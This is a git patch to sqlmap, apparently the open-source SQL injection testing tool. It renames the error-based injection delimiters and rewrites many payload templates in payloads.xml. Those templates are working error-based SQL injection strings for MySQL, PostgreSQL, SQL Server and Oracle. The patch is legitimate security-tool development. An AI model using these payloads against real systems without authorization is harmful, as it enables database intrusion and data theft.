From 2708aad5040ec724b9eb9957210258d2bf761977 Mon Sep 17 00:00:00 2001 From: Bernardo Damele Date: Wed, 1 Dec 2010 10:31:50 +0000 Subject: [PATCH] Unified start and stop delimiters accross errror-based (detection engine) and union query (--union-test) tests. --- lib/core/agent.py | 14 +++++------ lib/core/settings.py | 4 +--- lib/techniques/error/use.py | 13 ++++------ xml/payloads.xml | 48 ++++++++++++++++++------------------- 4 files changed, 37 insertions(+), 42 deletions(-) diff --git a/lib/core/agent.py b/lib/core/agent.py index 9cb58de2b..eb41c7cf8 100644 --- a/lib/core/agent.py +++ b/lib/core/agent.py @@ -22,8 +22,6 @@ from lib.core.datatype import advancedDict from lib.core.enums import DBMS from lib.core.enums import PLACE from lib.core.exception import sqlmapNoneDataException -from lib.core.settings import ERROR_START_CHAR -from lib.core.settings import ERROR_END_CHAR from lib.core.settings import PAYLOAD_DELIMITER class Agent: @@ -33,9 +31,9 @@ class Agent: def __init__(self): kb.misc = advancedDict() - kb.misc.delimiter = randomStr(6) - kb.misc.start = randomStr(6) - kb.misc.stop = randomStr(6) + kb.misc.delimiter = randomStr(length=6) + kb.misc.start = ":%s:" % randomStr(length=3, lowercase=True) + kb.misc.stop = ":%s:" % randomStr(length=3, lowercase=True) def payloadDirect(self, query): if query.startswith("AND "): @@ -163,12 +161,14 @@ class Agent: randInt = randomInt() randInt1 = randomInt() randStr = randomStr() + randStr1 = randomStr() payload = payload.replace("[RANDNUM]", str(randInt)) payload = payload.replace("[RANDNUM1]", str(randInt1)) payload = payload.replace("[RANDSTR]", randStr) - payload = payload.replace("[ERROR_START_CHAR]", ERROR_START_CHAR) - payload = payload.replace("[ERROR_END_CHAR]", ERROR_END_CHAR) + payload = payload.replace("[RANDSTR1]", randStr1) + payload = payload.replace("[DELIMITER_START]", kb.misc.start) + payload = payload.replace("[DELIMITER_STOP]", kb.misc.stop) payload = payload.replace("[SLEEPTIME]", str(conf.timeSec)) return payload diff --git a/lib/core/settings.py b/lib/core/settings.py index 164691a23..8f81986a4 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -46,11 +46,9 @@ DUMP_TAB_MARKER = "__TAB__" DUMP_START_MARKER = "__START__" DUMP_STOP_MARKER = "__STOP__" -# error based injection markers +# error-based injection markers ERROR_SPACE = ":_:" ERROR_EMPTY_CHAR = ":x:" -ERROR_START_CHAR = ":s:" -ERROR_END_CHAR = ":e:" PAYLOAD_DELIMITER = "\x00" diff --git a/lib/techniques/error/use.py b/lib/techniques/error/use.py index 6a0286fbf..7e71bb493 100644 --- a/lib/techniques/error/use.py +++ b/lib/techniques/error/use.py @@ -27,8 +27,6 @@ from lib.utils.resume import resume from lib.core.settings import ERROR_SPACE from lib.core.settings import ERROR_EMPTY_CHAR -from lib.core.settings import ERROR_START_CHAR -from lib.core.settings import ERROR_END_CHAR def errorUse(expression, returnPayload=False): """ @@ -55,21 +53,20 @@ def errorUse(expression, returnPayload=False): expressionReplaced = expression.replace(fieldToCastStr, nulledCastedField, 1) expressionUnescaped = unescaper.unescape(expressionReplaced) - startLimiter = unescaper.unescape("'%s'" % ERROR_START_CHAR) - endLimiter = unescaper.unescape("'%s'" % ERROR_END_CHAR) + startLimiter = unescaper.unescape("'%s'" % kb.misc.start) + endLimiter = unescaper.unescape("'%s'" % kb.misc.stop) else: expressionUnescaped = kb.misc.handler.unescape(expression) - startLimiter = kb.misc.handler.unescape("'%s'" % ERROR_START_CHAR) - endLimiter = kb.misc.handler.unescape("'%s'" % ERROR_END_CHAR) + startLimiter = kb.misc.handler.unescape("'%s'" % kb.misc.start) + endLimiter = kb.misc.handler.unescape("'%s'" % kb.misc.stop) forgedQuery = safeStringFormat(query, (logic, randInt, startLimiter, expressionUnescaped, endLimiter)) - debugMsg = "query: %s" % forgedQuery logger.debug(debugMsg) payload = agent.payload(newValue=forgedQuery) result = Request.queryPage(payload, content=True) - match = re.search('%s(?P.*?)%s' % (ERROR_START_CHAR, ERROR_END_CHAR), result[0], re.DOTALL | re.IGNORECASE) + match = re.search('%s(?P.*?)%s' % (kb.misc.start, kb.misc.stop), result[0], re.DOTALL | re.IGNORECASE) if match: output = match.group('result') diff --git a/xml/payloads.xml b/xml/payloads.xml index 895624176..7aaccbf27 100644 --- a/xml/payloads.xml +++ b/xml/payloads.xml @@ -620,10 +620,10 @@ Formats: 1 1 - AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[ERROR_START_CHAR]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[ERROR_END_CHAR]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) + AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) - [ERROR_START_CHAR](?P<result>.*?)[ERROR_END_CHAR] + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
MySQL @@ -639,10 +639,10 @@ Formats: 1 1 - AND [RANDNUM]=CAST('[ERROR_START_CHAR]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[ERROR_END_CHAR]' AS NUMERIC) + AND [RANDNUM]=CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC) - [ERROR_START_CHAR](?P<result>.*?)[ERROR_END_CHAR] + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
PostgreSQL @@ -657,10 +657,10 @@ Formats: 1 1 - AND [RANDNUM]=CONVERT(INT,('[ERROR_START_CHAR]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[ERROR_END_CHAR]')) + AND [RANDNUM]=CONVERT(INT,('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')) - [ERROR_START_CHAR](?P<result>.*?)[ERROR_END_CHAR] + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
Microsoft SQL Server @@ -675,10 +675,10 @@ Formats: 1 1 - AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[ERROR_START_CHAR]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[ERROR_END_CHAR]'||CHR(62))) FROM DUAL) + AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) - [ERROR_START_CHAR](?P<result>.*?)[ERROR_END_CHAR] + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
Oracle @@ -700,10 +700,10 @@ Formats: 2,3 1 - (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[ERROR_START_CHAR]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[ERROR_END_CHAR]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) + (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) - [ERROR_START_CHAR](?P<result>.*?)[ERROR_END_CHAR] + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
MySQL @@ -719,10 +719,10 @@ Formats: 2,3 1 - (CAST('[ERROR_START_CHAR]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[ERROR_END_CHAR]' AS NUMERIC)) + (CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC)) - [ERROR_START_CHAR](?P<result>.*?)[ERROR_END_CHAR] + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
PostgreSQL @@ -737,10 +737,10 @@ Formats: 3 1 - (CONVERT(INT,('[ERROR_START_CHAR]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[ERROR_END_CHAR]'))) + (CONVERT(INT,('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))) - [ERROR_START_CHAR](?P<result>.*?)[ERROR_END_CHAR] + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
Microsoft SQL Server @@ -755,10 +755,10 @@ Formats: 3 1 - (SELECT UPPER(XMLType(CHR(60)||'[ERROR_START_CHAR]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[ERROR_END_CHAR]'||CHR(62))) FROM DUAL) + (SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) - [ERROR_START_CHAR](?P<result>.*?)[ERROR_END_CHAR] + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
Oracle @@ -773,10 +773,10 @@ Formats: 2,3 3 - (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[ERROR_START_CHAR]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[ERROR_END_CHAR]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) + (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) - [ERROR_START_CHAR](?P<result>.*?)[ERROR_END_CHAR] + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
MySQL @@ -792,10 +792,10 @@ Formats: 2,3 3 - (CAST('[ERROR_START_CHAR]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[ERROR_END_CHAR]' AS NUMERIC)) + (CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC)) - [ERROR_START_CHAR](?P<result>.*?)[ERROR_END_CHAR] + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
PostgreSQL @@ -810,10 +810,10 @@ Formats: 3 3 - (CONVERT(INT,('[ERROR_START_CHAR]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[ERROR_END_CHAR]'))) + (CONVERT(INT,('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))) - [ERROR_START_CHAR](?P<result>.*?)[ERROR_END_CHAR] + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
Microsoft SQL Server @@ -828,10 +828,10 @@ Formats: 3 3 - (SELECT UPPER(XMLType(CHR(60)||'[ERROR_START_CHAR]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[ERROR_END_CHAR]'||CHR(62))) FROM DUAL) + (SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) - [ERROR_START_CHAR](?P<result>.*?)[ERROR_END_CHAR] + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
Oracle